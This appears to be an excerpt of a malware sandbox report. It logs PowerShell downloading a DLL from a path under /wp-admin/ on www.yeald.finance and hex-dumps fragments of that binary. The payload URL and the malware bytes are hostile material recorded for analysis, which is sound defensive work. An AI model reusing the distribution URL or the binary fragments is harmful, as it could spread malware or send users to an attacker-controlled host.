                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.2.224916794.130.116.76443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2022-01-28 19:52:28 UTC0OUTGET /wp-admin/1WgPRm/ HTTP/1.1
                                                                                                                        Host: www.yeald.finance
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2022-01-28 19:52:28 UTC0INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Fri, 28 Jan 2022 19:52:28 GMT
                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                        Content-Length: 548864
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: 61f4497c75177=1643399548; expires=Fri, 28-Jan-2022 19:53:28 GMT; Max-Age=60; path=/
                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Last-Modified: Fri, 28 Jan 2022 19:52:28 GMT
                                                                                                                        Expires: Fri, 28 Jan 2022 19:52:28 GMT
                                                                                                                        Content-Disposition: attachment; filename="iGyKncX6PkzSkNuPH.dll"
                                                                                                                        Content-Transfer-Encoding: binary
                                                                                                                        2022-01-28 19:52:28 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00
                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a
                                                                                                                        2022-01-28 19:52:28 UTC16INData Raw: 05 10 2b 0d c8 30 05 10 2b 0d c4 30 05 10 2b 0d b8 30 05 10 2b 0d c0 30 05 10 8b 15 c8 30 05 10 0f af 15 bc 30 05 10 03 ca 8b 15 c8 30 05 10 0f af 15 bc 30 05 10 2b ca 2b 0d c8 30 05 10 2b 0d bc 30 05 10 2b 0d c0 30 05 10 8b 15 b8 30 05 10 0f af 15 c4 30 05 10 2b ca 2b 0d c8 30 05 10 8b 15 c0 30 05 10 0f af 15 c4 30 05 10 2b ca 2b 0d c8 30 05 10 8b 15 b8 30 05 10 0f af 15 c4 30 05 10 2b ca 8b 15 c8 30 05 10 0f af 15 bc 30 05 10 0f af 15 bc 30 05 10 03 ca 8b 15 c0 30 05 10 0f af 15 c0 30 05 10 2b ca 2b 0d c0 30 05 10 2b 0d c8 30 05 10 2b 0d c4 30 05 10 8b 55 08 88 04 0a e9 b2 ec ff ff 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 14 56 57 c7 45 fc 00 00 00 00 c7 45 ec 00 00 00 00 c7 45 f0 00 00 00 00 c7 45 f4 00 00 00 00 c7 45 f4 00 00 00 00 eb
                                                                                                                        Data Ascii: +0+0+0+00000++0+0+000++000++000+00000++0+0+0U^]UVWEEEEE
                                                                                                                        2022-01-28 19:52:28 UTC32INData Raw: af 55 e0 2b c2 03 45 dc 03 45 f0 8b 4d dc 0f af 4d f0 03 c1 8b 55 e4 0f af 55 f4 03 c2 8b 4d dc 0f af 4d e0 2b c1 03 45 dc 03 45 f0 8b 55 dc 0f af 55 f0 03 c2 8b 4d e4 0f af 4d f4 03 c1 8b 55 dc 0f af 55 e0 2b c2 03 45 dc 03 45 f0 8b 4d dc 0f af 4d f0 03 c1 8b 55 e4 0f af 55 f4 03 c2 8b 4d dc 0f af 4d e0 2b c1 03 45 dc 03 45 f0 03 45 dc 89 45 e8 8b 55 e8 0f af 55 f4 8b 45 e4 0f af 45 e4 0f af 45 f4 03 d0 8b 4d e4 0f af 4d e4 0f af 4d f4 03 d1 8b 45 e4 0f af 45 e4 0f af 45 f4 03 d0 8b 4d e4 0f af 4d e4 0f af 4d f4 03 d1 8b 45 e4 0f af 45 e4 0f af 45 f4 03 d0 8b 4d e4 0f af 4d e4 0f af 4d f4 03 d1 8b 45 e4 0f af 45 e4 0f af 45 f4 03 d0 8b 4d e4 0f af 4d e4 0f af 4d f4 03 d1 8b 45 e4 0f af 45 e4 0f af 45 f4 03 d0 8b 4d e4 0f af 4d e4 0f af 4d f4 03 d1 8b 45
                                                                                                                        Data Ascii: U+EEMMUUMM+EEUUMMUU+EEMMUUMM+EEEEUUEEEMMMEEEMMMEEEMMMEEEMMMEEEMMME
                                                                                                                        2022-01-28 19:52:28 UTC48INData Raw: 8b 4d e4 0f af 4d dc 0f af 4d dc 2b f1 8b 55 f0 0f af 55 e4 03 f2 8b 45 f4 0f af 45 e4 2b f0 2b 75 f0 03 75 f4 8b 45 e4 99 f7 7d f0 2b f0 8b 4d dc 0f af 4d e4 0f af 4d f4 2b f1 8b 4d e0 0f af 4d dc 0f af 4d e4 0f af 4d f4 0f af 4d f4 03 75 dc 03 ce 2b 4d e4 2b 4d dc 2b 4d e4 8b 55 dc 0f af 55 e0 03 ca 8b 45 e4 0f af 45 dc 0f af 45 dc 2b c8 8b 55 f0 0f af 55 e4 03 ca 8b 45 f4 0f af 45 e4 2b c8 2b 4d f0 03 4d f4 8b 45 e4 99 f7 7d f0 2b c8 8b 55 dc 0f af 55 e4 0f af 55 f4 2b ca 8b 75 e0 0f af 75 dc 0f af 75 e4 0f af 75 f4 0f af 75 f4 03 4d dc 03 f1 2b 75 e4 2b 75 dc 2b 75 e4 8b 45 dc 0f af 45 e0 03 f0 8b 4d e4 0f af 4d dc 0f af 4d dc 2b f1 8b 55 f0 0f af 55 e4 03 f2 8b 45 f4 0f af 45 e4 2b f0 2b 75 f0 03 75 f4 8b 45 e4 99 f7 7d f0 2b f0 8b 4d dc 0f af 4d e4
                                                                                                                        Data Ascii: MMM+UUEE++uuE}+MMM+MMMMMu+M+M+MUUEEE+UUEE++MME}+UUU+uuuuuM+u+u+uEEMMM+UUEE++uuE}+MM
                                                                                                                        2022-01-28 19:52:28 UTC64INData Raw: 99 f7 7d e4 03 c8 2b 4d f0 03 4d dc 8b 45 f4 0f af 45 f4 2b c8 03 4d f4 8b 55 dc 0f af 55 dc 2b ca 2b 4d e0 8b 45 e4 0f af 45 dc 0f af 45 e0 03 c8 2b 4d e4 8b 45 e0 99 f7 7d f4 03 c8 2b 4d e4 2b 4d e0 8b 45 e4 99 f7 7d e4 99 f7 7d f4 99 f7 7d e4 03 c8 2b 4d f0 03 4d dc 8b 55 f4 0f af 55 f4 2b ca 03 4d f4 8b 45 dc 0f af 45 dc 2b c8 2b 4d e0 8b 55 e4 0f af 55 dc 0f af 55 e0 03 ca 2b 4d e4 8b 45 e0 99 f7 7d f4 03 c8 2b 4d e4 2b 4d e0 8b 45 e4 99 f7 7d e4 99 f7 7d f4 99 f7 7d e4 03 c8 2b 4d f0 03 4d dc 8b 45 f4 0f af 45 f4 2b c8 03 4d f4 8b 55 dc 0f af 55 dc 2b ca 2b 4d e0 8b 45 e4 0f af 45 dc 0f af 45 e0 03 c8 2b 4d e4 8b 45 e0 99 f7 7d f4 03 c8 2b 4d e4 2b 4d e0 8b 45 e4 99 f7 7d e4 99 f7 7d f4 99 f7 7d e4 03 c8 2b 4d f0 03 4d dc 8b 55 f4 0f af 55 f4 2b ca
                                                                                                                        Data Ascii: }+MMEE+MUU++MEEE+ME}+M+ME}}}+MMUU+MEE++MUUU+ME}+M+ME}}}+MMEE+MUU++MEEE+ME}+M+ME}}}+MMUU+
                                                                                                                        2022-01-28 19:52:28 UTC80INData Raw: 75 0d 8b 4d f0 e8 99 00 00 00 e9 83 00 00 00 83 7d 08 00 75 0a 68 57 00 07 80 e8 74 fd ff ff 8b 4d f0 e8 0c fb ff ff 89 45 fc 8b 4d f0 e8 21 fb ff ff 8b 4d 08 2b c8 89 4d f8 8b 55 0c 52 8b 4d f0 e8 cd fa ff ff 89 45 f4 8b 45 f8 3b 45 fc 77 1d 8b 4d 0c 51 8b 55 f4 03 55 f8 52 8b 45 0c 50 8b 4d f4 51 e8 ca 02 00 00 83 c4 10 eb 18 8b 55 0c 52 8b 45 08 50 8b 4d 0c 51 8b 55 f4 52 e8 90 02 00 00 83 c4 10 8b 45 0c 50 8b 4d f0 e8 f1 fd ff ff 8b e5 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 10 89 4d f0 8b 4d f0 e8 3f d4 fe ff 89 45 f8 8b 45 f8 8b 08 89 4d fc 8b 55 f8 83 7a 04 00 75 02 eb 3f 8b 4d f8 e8 71 fd ff ff 0f b6 c0 85 c0 74 0c 6a 00 8b 4d f0 e8 30 fe ff ff eb 24 8b 4d f8 e8 c6 d3 fe ff 8b 4d fc 8b 11 8b 4d fc 8b 42 0c ff d0 89 45 f4 8b 4d
                                                                                                                        Data Ascii: uM}uhWtMEM!M+MURMEE;EwMQUUREPMQUREPMQUREPM]UMM?EEMUzu?MqtjM0$MMMBEM
                                                                                                                        2022-01-28 19:52:28 UTC96INData Raw: 85 c0 76 50 bf ff ff ff 1f 3b df 73 02 8b fb 8b 4d 08 8b f7 c1 e6 02 56 ff 75 10 e8 b1 aa 00 00 01 75 10 2b df 85 db 77 db eb 29 85 c0 76 25 bf ff ff ff 1f 3b df 73 02 8b fb 8b 4d 08 8b f7 c1 e6 02 56 ff 75 10 e8 7e fd ff ff 01 75 10 2b df 85 db 77 db 5f 5e 5b 5d c2 0c 00 56 8b f1 83 7e 10 00 75 30 6a 0c ff 76 18 8d 46 14 50 e8 0e a4 00 00 8b 4e 18 8b d1 6b d2 0c 83 c0 04 49 8d 44 10 f4 78 10 8b 56 10 89 10 89 46 10 49 83 e8 0c 85 c9 7d f0 8b 46 10 85 c0 75 05 e8 44 83 00 00 8b 08 89 4e 10 8b 4c 24 08 89 48 04 8b 4c 24 0c 89 08 ff 46 0c 5e c2 08 00 55 8b ec 53 8b 5d 08 8b 43 4c 85 c0 0f 84 fc 00 00 00 8b 40 44 85 c0 89 45 08 0f 84 ad 00 00 00 56 57 8b 4b 4c 8d 45 08 83 c1 40 50 e8 9e fc ff ff 8b 30 8b 46 04 85 c0 0f 84 83 00 00 00 8b b8 94 00 00 00 eb 31
                                                                                                                        Data Ascii: vP;sMVuu+w)v%;sMVu~u+w_^[]V~u0jvFPNkIDxVFI}FuDNL$HL$F^US]CL@DEVWKLE@P0F1
                                                                                                                        2022-01-28 19:52:28 UTC112INData Raw: 08 00 75 07 b8 03 40 00 80 eb 0d 8b 40 08 ff 74 24 08 8b 08 50 ff 51 4c c2 08 00 8b 44 24 04 83 78 08 00 56 57 75 07 b8 08 01 01 80 eb 28 83 7c 24 20 00 75 07 b8 03 40 00 80 eb 1a ff 74 24 20 8b 40 08 8b 08 83 ec 10 8b fc 8d 74 24 24 a5 a5 a5 50 a5 ff 51 50 5f 5e c2 18 00 8b 44 24 04 83 78 08 00 56 57 75 07 b8 08 01 01 80 eb 1a 8b 40 08 8b 08 83 ec 10 8b fc ff 74 24 20 8d 74 24 28 a5 a5 a5 50 a5 ff 51 54 5f 5e c2 18 00 55 8b ec 8b 45 08 33 c9 39 48 08 56 57 75 07 b8 08 01 01 80 eb 3c 39 4d 0c 75 07 b8 03 40 00 80 eb 30 39 4d 10 74 f4 39 4d 14 74 ef 39 4d 18 74 ea 8b 40 08 8b 08 83 ec 10 8b fc ff 75 18 8d 75 1c ff 75 14 a5 ff 75 10 a5 ff 75 0c a5 50 a5 ff 51 58 5f 5e 5d c2 24 00 55 8b ec 8b 45 08 83 78 08 00 56 57 75 07 b8 08 01 01 80 eb 28 83 7d 20 00 75
                                                                                                                        Data Ascii: u@@t$PQLD$xVWu(|$ u@t$ @t$$PQP_^D$xVWu@t$ t$(PQT_^UE39HVWu<9Mu@09Mt9Mt9Mt@uuuuuPQX_^]$UExVWu(} u
                                                                                                                        2022-01-28 19:52:28 UTC128INData Raw: 8d 48 f0 33 d2 39 51 04 57 8b 39 74 2f 39 51 0c 7d 19 39 50 f8 7d 0a 68 57 00 07 80 e8 72 3d ff ff 89 50 f4 8b 06 66 89 10 eb 11 e8 83 14 fe ff 8b 07 8b cf ff 50 0c 83 c0 10 89 06 5f 5e c3 55 8b ec 51 51 53 56 8b 31 8b 5e f4 83 ee 10 89 4d f8 8b 0e 8b 01 57 89 5d fc ff 50 10 8b 10 6a 02 ff 75 08 8b c8 ff 12 8b f8 85 ff 75 05 e8 7e ff ff ff 8b 45 08 3b d8 7d 02 8b c3 40 50 8d 4e 10 51 50 8d 5f 10 53 e8 82 fd ff ff 8b 45 fc 83 c4 10 8b ce 89 47 04 e8 18 14 fe ff 8b 45 f8 5f 5e 89 18 5b c9 c2 04 00 8b 54 24 04 56 8b f1 8b 06 83 e8 10 39 50 08 8b 08 7d 13 85 d2 7e 0f 57 8b 39 6a 02 52 50 ff 57 08 85 c0 5f 75 05 e8 1e ff ff ff 83 c0 10 89 06 5e c2 04 00 8b 01 8b 50 f4 83 e8 10 56 8b 74 24 08 3b d6 7e 02 8b f2 83 78 0c 01 7e 08 56 e8 45 ff ff ff eb 22 8b 40 08
                                                                                                                        Data Ascii: H39QW9t/9Q}9P}hWr=PfP_^UQQSV1^MW]Pjuu~E;}@PNQP_SEGE_^[T$V9P}~W9jRPW_u^PVt$;~x~VE"@
                                                                                                                        2022-01-28 19:52:28 UTC144INData Raw: 10 1f 3d 02 10 8e 3d 02 10 e7 3d 02 10 00 01 01 02 03 03 03 01 09 04 01 05 06 07 08 06 6a 0c b8 63 48 04 10 e8 24 cf 00 00 8b f1 89 75 ec 83 26 00 83 65 fc 00 8b 45 08 33 c9 6a 08 5a f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 93 06 ff ff 59 89 06 eb 11 8b 4d e8 e8 97 c2 ff ff b8 6c 3e 02 10 c3 8b 75 ec 83 3e 00 75 07 b8 0e 00 07 80 eb 08 8b 45 08 89 46 04 33 c0 e8 77 cf 00 00 c2 04 00 55 8b ec 56 8b 75 08 33 d2 3b f2 75 07 b8 05 40 00 80 eb 48 39 55 10 74 f4 8b 45 18 3b c2 74 ed 53 8b 18 57 8b 7d 0c 52 ff 75 10 33 c9 39 56 24 ff 75 14 0f 95 c1 56 57 8d 4c 09 02 51 50 ff 53 10 85 ff 8b d8 76 11 83 c6 14 ff 36 e8 3b 06 ff ff 83 c6 34 4f 59 75 f2 5f 8b c3 5b 5e 5d c3 8b 54 24 04 8b c1 33 c9 89 50 20 8b 54 24 08 89 08 89 48 04 89 48 08 89 48 0c 89 48 14 89 48 18 89 50
                                                                                                                        Data Ascii: ===jcH$u&eE3jZQYMl>u>uEF3wUVu3;u@H9UtE;tSW}Ru39V$uVWLQPSv6;4OYu_[^]T$3P T$HHHHHP
                                                                                                                        2022-01-28 19:52:28 UTC160INData Raw: fc 28 3b 46 10 0f 8c 5f ff ff ff 8b 4e 38 8b 46 08 8b 10 53 8b f9 c1 e7 04 57 ff 76 3c 51 50 ff 52 10 8b 46 38 3b c3 74 18 33 c9 6a 10 5a f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 a2 c6 fe ff 59 89 46 40 39 5e 38 7e 25 33 ff 8b 46 40 6a 10 03 c7 6a 00 50 e8 cc 81 00 00 8b 46 40 66 83 24 07 00 83 c4 0c 43 83 c7 10 3b 5e 38 7c dd 8b ce e8 b2 f5 ff ff 8b 06 8b ce ff 50 10 5f 5e 5b c9 c3 33 c0 56 ff 74 24 08 8b f1 89 06 89 46 04 89 46 10 89 46 08 89 46 0c e8 43 fc ff ff 8b c6 5e c2 04 00 56 8b f1 e8 92 d3 ff ff 8b 06 8b 08 6a 00 50 ff 51 1c 85 c0 7c 0b 6a 01 6a 00 8b ce e8 73 f1 ff ff 5e c3 53 56 8b f1 8b 4e 08 57 8b 79 04 33 c0 33 db 85 ff 76 11 53 8b ce e8 14 fc ff ff 85 c0 7c 05 43 3b df 72 ef 5f 5e 5b c3 56 ff 74 24 08 8b f1 e8 d8 fc ff ff ff 74 24 08 8b ce e8 bb
                                                                                                                        Data Ascii: (;F_N8FSWv<QPRF8;t3jZQYF@9^8~%3F@jjPF@f$C;^8|P_^[3Vt$FFFFC^VjPQ|jjs^SVNWy33vS|C;r_^[Vt$t$
                                                                                                                        2022-01-28 19:52:28 UTC176INData Raw: 83 61 04 00 8b 48 08 89 51 08 8b 48 08 89 01 8b 48 08 66 83 61 10 00 c2 0c 00 c7 01 48 91 04 10 c3 56 8b f1 8b 46 08 57 8b 7c 24 0c 3b 78 08 7e 2b 8b 0d 94 5a 05 10 85 c9 74 09 8b 11 50 ff 70 08 57 ff 12 ff 74 24 10 8b 4e 04 8b 01 57 ff 10 85 c0 74 1b 83 48 0c ff 89 30 eb 13 83 48 0c ff 8b 46 08 83 60 04 00 8b 46 08 89 30 8b 46 08 5f 5e c2 08 00 8b 44 24 04 56 8b f1 3b 46 08 74 0e 8b 4e 04 89 08 8b 4e 04 8b 11 50 ff 52 04 8b 46 08 83 48 0c ff 8b 46 08 83 60 04 00 8b 46 08 66 83 60 10 00 5e c2 04 00 55 8b ec 53 56 8b 75 08 8b d9 3b 73 08 57 74 22 ff 75 10 8b 43 04 ff 75 0c 89 06 8b 4b 04 8b 01 56 ff 50 08 8b f8 85 ff 75 04 89 1e eb 66 89 1f eb 62 8b 46 08 39 45 0c 7e 58 8b 0d 94 5a 05 10 85 c9 74 0a 8b 11 56 50 ff 75 0c ff 52 04 ff 75 10 8b 4b 04 ff 75 0c
                                                                                                                        Data Ascii: aHQHHfaHVFW|$;x~+ZtPpWt$NWtH0HF`F0F_^D$V;FtNNPRFHF`Ff`^USVu;sWt"uCuKVPufbF9E~XZtVPuRuKu
                                                                                                                        2022-01-28 19:52:28 UTC192INData Raw: 10 8b ff 20 fe 02 10 28 fe 02 10 38 fe 02 10 4c fe 02 10 8b 45 08 5e 5f c9 c3 90 8a 46 03 88 47 03 8b 45 08 5e 5f c9 c3 8d 49 00 8a 46 03 88 47 03 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 6a 0c 68 a8 09 05 10 e8 c7 2c 00 00 33 c0 33 f6 39 75 08 0f 95 c0 3b c6 75 1d e8 70 13 00 00 c7 00 16 00 00 00 56 56 56 56 56 e8 bf 78 00 00 83 c4 14 83 c8 ff eb 5f e8 d4 6b 00 00 6a 20 5b 03 c3 50 6a 01 e8 cd 6c 00 00 59 59 89 75 fc e8 bd 6b 00 00 03 c3 50 e8 30 6d 00 00 59 8b f8 8d 45 0c 50 56 ff 75 08 e8 a5 6b 00 00 03 c3 50 e8 dd 6d 00 00 89 45 e4 e8 95 6b 00 00 03 c3 50 57 e8 9d 6d 00 00 83 c4 18 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 7d 2c 00 00 c3 e8 6f 6b 00 00 83 c0 20 50 6a 01
                                                                                                                        Data Ascii: (8LE^_FGE^_IFGFGE^_FGFGFGE^_jh,339u;upVVVVVx_kj [PjlYYukP0mYEPVukPmEkPWmEE},ok Pj
                                                                                                                        2022-01-28 19:52:28 UTC208INData Raw: 75 f0 99 ff 75 ec 89 45 e4 89 55 e8 e8 72 97 00 00 0b c2 bb 90 01 00 00 75 13 6a 00 6a 64 ff 75 f0 ff 75 ec e8 5a 97 00 00 0b c2 75 1c 8b 45 ec 8b 4d f0 6a 00 05 6c 07 00 00 53 83 d1 00 51 50 e8 3e 97 00 00 0b c2 75 0d 83 fe 01 7e 08 83 45 e4 01 83 55 e8 00 8b 75 ec 8b 45 f0 8b 55 f0 6a 00 59 83 ee 01 1b c1 89 45 e0 8b 45 ec 51 05 2b 01 00 00 53 13 d1 52 50 89 75 dc e8 13 fe ff ff 8b d8 8b c2 89 45 f4 8b 47 0c 99 6a 00 6a 64 ff 75 e0 03 d8 8b 45 f4 13 c2 56 89 45 f4 e8 f1 fd ff ff 6a 00 6a 04 ff 75 e0 2b d8 8b 45 f4 1b c2 56 89 45 f4 e8 da fd ff ff 6a 00 68 6d 01 00 00 ff 75 f0 03 d8 8b 45 f4 ff 75 ec 13 c2 89 45 f4 e8 1e c4 ff ff 03 d8 8b 45 f4 13 c2 03 5d e4 6a 00 13 45 e8 5e 56 81 eb df 63 00 00 6a 18 1b c6 50 53 e8 fc c3 ff ff 8b c8 8b 47 08 8b da 99
                                                                                                                        Data Ascii: uuEUrujjduuZuEMjlSQP>u~EUuEUjYEEQ+SRPuEGjjduEVEjju+EVEjhmuEuEE]jE^VcjPSG
                                                                                                                        2022-01-28 19:52:28 UTC224INData Raw: 08 e9 70 01 00 00 75 0f 66 83 fa 67 75 45 c7 45 e8 01 00 00 00 eb 3c 39 45 e8 7e 03 89 45 e8 81 7d e8 a3 00 00 00 7e 2b 8b 7d e8 81 c7 5d 01 00 00 57 e8 bc d9 ff ff 85 c0 8b 55 dc 59 89 45 b0 74 0a 89 45 e4 89 7d e0 8b f0 eb 07 c7 45 e8 a3 00 00 00 8b 03 83 c3 08 89 45 88 8b 43 fc 89 45 8c 8d 45 9c 50 ff 75 94 0f be c2 ff 75 e8 89 5d d8 50 ff 75 e0 8d 45 88 56 50 ff 35 08 4d 05 10 e8 1c d2 ff ff 59 ff d0 8b 5d ec 83 c4 1c 81 e3 80 00 00 00 74 1b 83 7d e8 00 75 15 8d 45 9c 50 56 ff 35 14 4d 05 10 e8 f5 d1 ff ff 59 ff d0 59 59 66 83 7d dc 67 75 19 85 db 75 15 8d 45 9c 50 56 ff 35 10 4d 05 10 e8 d5 d1 ff ff 59 ff d0 59 59 80 3e 2d 75 0b 81 4d ec 00 01 00 00 46 89 75 e4 56 e9 71 fe ff ff c7 45 e8 08 00 00 00 89 4d ac eb 21 83 e8 73 0f 84 3c fd ff ff 2b c7 0f
                                                                                                                        Data Ascii: pufguEE<9E~E}~+}]WUYEtE}EECEEPuu]PuEVP5MY]t}uEPV5MYYYf}guuEPV5MYYY>-uMFuVqEM!s<+
                                                                                                                        2022-01-28 19:52:28 UTC240INData Raw: db 3b c3 57 8b f9 75 3a 8d 45 f8 50 33 f6 46 56 68 bc a3 04 10 56 ff 15 38 61 04 10 85 c0 74 08 89 35 74 82 05 10 eb 34 ff 15 60 62 04 10 83 f8 78 75 0a 6a 02 58 a3 74 82 05 10 eb 05 a1 74 82 05 10 83 f8 02 0f 84 cf 00 00 00 3b c3 0f 84 c7 00 00 00 83 f8 01 0f 85 e8 00 00 00 39 5d 18 89 5d f8 75 08 8b 07 8b 40 04 89 45 18 8b 35 70 62 04 10 33 c0 39 5d 20 53 53 ff 75 10 0f 95 c0 ff 75 0c 8d 04 c5 01 00 00 00 50 ff 75 18 ff d6 8b f8 3b fb 0f 84 ab 00 00 00 7e 3c 81 ff f0 ff ff 7f 77 34 8d 44 3f 08 3d 00 04 00 00 77 13 e8 10 44 ff ff 8b c4 3b c3 74 1c c7 00 cc cc 00 00 eb 11 50 e8 d2 3a ff ff 3b c3 59 74 09 c7 00 dd dd 00 00 83 c0 08 8b d8 85 db 74 69 8d 04 3f 50 6a 00 53 e8 3c 41 ff ff 83 c4 0c 57 53 ff 75 10 ff 75 0c 6a 01 ff 75 18 ff d6 85 c0 74 11 ff 75
                                                                                                                        Data Ascii: ;Wu:EP3FVhV8at5t4`bxujXtt;9]]u@E5pb39] SSuuPu;~<w4D?=wD;tP:;Ytti?PjS<AWSuujutu
                                                                                                                        2022-01-28 19:52:28 UTC256INData Raw: ff ff 83 c4 14 83 c8 ff eb 42 f6 46 0c 83 74 37 56 e8 90 dd ff ff 56 8b d8 e8 1d 2e 00 00 56 e8 67 df ff ff 50 e8 44 2d 00 00 83 c4 10 85 c0 7d 05 83 cb ff eb 11 8b 46 1c 3b c7 74 0a 50 e8 19 fc fe ff 59 89 7e 1c 89 7e 0c 8b c3 5f 5e 5b c3 6a 0c 68 d0 0e 05 10 e8 cf 2c ff ff 83 4d e4 ff 33 c0 8b 75 08 33 ff 3b f7 0f 95 c0 3b c7 75 1d e8 72 13 ff ff c7 00 16 00 00 00 57 57 57 57 57 e8 c1 78 ff ff 83 c4 14 83 c8 ff eb 0c f6 46 0c 40 74 0c 89 7e 0c 8b 45 e4 e8 d2 2c ff ff c3 56 e8 9a 6c ff ff 59 89 7d fc 56 e8 2e ff ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 05 00 00 00 eb d5 8b 75 08 56 e8 c7 6c ff ff 59 c3 6a 10 68 f0 0e 05 10 e8 53 2c ff ff 8b 45 08 83 f8 fe 75 13 e8 02 13 ff ff c7 00 09 00 00 00 83 c8 ff e9 aa 00 00 00 33 db 3b c3 7c 08 3b 05 0c 84 05 10
                                                                                                                        Data Ascii: BFt7VV.VgPD-}F;tPY~~_^[jh,M3u3;;urWWWWWxF@t~E,VlY}V.YEEuVlYjhS,Eu3;|;
                                                                                                                        2022-01-28 19:52:28 UTC272INData Raw: 02 00 00 e9 5a 4c fd ff 8b 54 24 08 8d 42 0c 8b 4a f8 33 c8 e8 f8 b9 fe ff b8 f8 e4 04 10 e9 b0 b6 fe ff 8d 4d e8 e9 48 d4 fb ff 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 d5 b9 fe ff b8 6c e5 04 10 e9 8d b6 fe ff 8d 8d 7c ff ff ff e9 e2 f3 fc ff 8b 54 24 08 8d 42 0c 8b 4a 80 33 c8 e8 af b9 fe ff b8 98 e5 04 10 e9 67 b6 fe ff 8d 8d 7c ff ff ff e9 48 b2 fd ff 8b 54 24 08 8d 42 0c 8b 8a 78 ff ff ff 33 c8 e8 86 b9 fe ff 8b 4a e4 33 c8 e8 7c b9 fe ff b8 c4 e5 04 10 e9 34 b6 fe ff 8d 8d 7c ff ff ff e9 c9 d3 fb ff 8d 4d 80 e9 c1 d3 fb ff 8b 54 24 08 8d 42 0c 8b 8a 74 ff ff ff 33 c8 e8 4b b9 fe ff 8b 4a f8 33 c8 e8 41 b9 fe ff b8 f8 e5 04 10 e9 f9 b5 fe ff cc cc cc cc cc cc cc cc cc 8b 4d f0 e9 a8 d3 fb ff 8b 54 24 08 8d 42 0c 8b 4a f8 33 c8 e8 15 b9 fe ff b8 24 e6
                                                                                                                        Data Ascii: ZLT$BJ3MHT$BJ3l|T$BJ3g|HT$Bx3J3|4|MT$Bt3KJ3AMT$BJ3$
                                                                                                                        2022-01-28 19:52:28 UTC288INData Raw: 31 25 82 68 84 69 80 48 c5 04 10 3d 9f 01 10 49 6e 69 74 43 6f 6d 6d 6f 6e 43 6f 6e 74 72 6f 6c 73 00 00 49 6e 69 74 43 6f 6d 6d 6f 6e 43 6f 6e 74 72 6f 6c 73 45 78 00 00 00 00 48 74 6d 6c 48 65 6c 70 41 00 00 00 68 68 63 74 72 6c 2e 6f 63 78 00 00 08 c9 04 10 c8 c6 01 10 a0 c6 01 10 96 c6 01 10 10 2e 02 10 28 c5 01 10 f4 c8 04 10 aa c6 01 10 be c6 01 10 b4 c6 01 10 b1 bf 01 10 00 00 00 00 10 c7 04 10 61 c6 01 10 36 c6 01 10 43 c6 01 10 2f c0 01 10 50 c0 01 10 00 c0 01 10 c8 bf 01 10 24 bb 01 10 53 bb 01 10 82 bb 01 10 c2 bb 01 10 02 bc 01 10 42 bc 01 10 82 bc 01 10 c2 bc 01 10 02 bd 01 10 42 bd 01 10 8a bd 01 10 ca bd 01 10 f9 bd 01 10 28 be 01 10 68 be 01 10 9a be 01 10 f2 be 01 10 35 bf 01 10 6b bf 01 10 99 bf 01 10 99 bf 01 10 7a c6 01 10 04 7e 04 10
                                                                                                                        Data Ascii: 1%hiH=InitCommonControlsInitCommonControlsExHtmlHelpAhhctrl.ocx.(a6C/P$SBB(h5kz~
                                                                                                                        2022-01-28 19:52:28 UTC304INData Raw: be 04 10 00 00 00 00 00 30 05 10 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 ec bd 04 10 28 30 05 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 4c be 04 10 00 00 00 00 00 00 00 00 04 00 00 00 5c be 04 10 30 be 04 10 70 be 04 10 ac be 04 10 e4 be 04 10 00 00 00 00 40 30 05 10 02 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 8c be 04 10 00 00 00 00 00 00 00 00 03 00 00 00 9c be 04 10 70 be 04 10 ac be 04 10 e4 be 04 10 00 00 00 00 5c 30 05 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 be 04 10 00 00 00 00 00 00 00 00 02 00 00 00 d8 be 04 10 ac be 04 10 e4 be 04 10 00 00 00 00 78 30 05 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 00 bf 04 10 00 00 00 00 00 00 00 00 01 00 00 00
                                                                                                                        Data Ascii: 0@(0@L\0p@0@p\0@x0@
